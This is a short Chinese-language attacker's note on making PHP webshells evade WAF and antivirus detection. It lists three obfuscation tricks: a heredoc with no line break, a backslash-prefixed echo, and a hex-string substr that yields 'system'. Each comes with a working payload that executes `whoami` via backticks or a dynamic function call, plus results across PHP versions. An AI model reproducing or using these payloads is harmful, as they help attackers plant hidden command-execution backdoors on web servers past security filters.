webshell免杀
https://xz.aliyun.com/t/10937
https://xz.aliyun.com/t/10989
php 免杀
传统php免杀
变形 + 外部参数 =解析=waf防火墙==> 命令执行
语法报错->解析失败
php版本 语义出错 php命令执行
- 利用在高版本php语法不换行来执行命令
<?=
$a=<<< aa
assasssasssasssasssasssasssasssasssasssasssassss
aa;echo `whoami`
?>
5.2.17nts 版本报错
5.3.29nts 报错
5.4.45nts 报错
7.3.4nts 执行
- 利用\特殊符号 引起报错
<?php
\echo `whoami`;?>
5.3.29nts 报错
7.3.4nts 报错
5.2.17nts
- 十六进制字符串
7 不认为是数字
5为数字
5.3 5.5 可执行
5.2 7 无法执行
<?php
$s=substr("aabbccsystem","0x6");
$s(whoami)
?>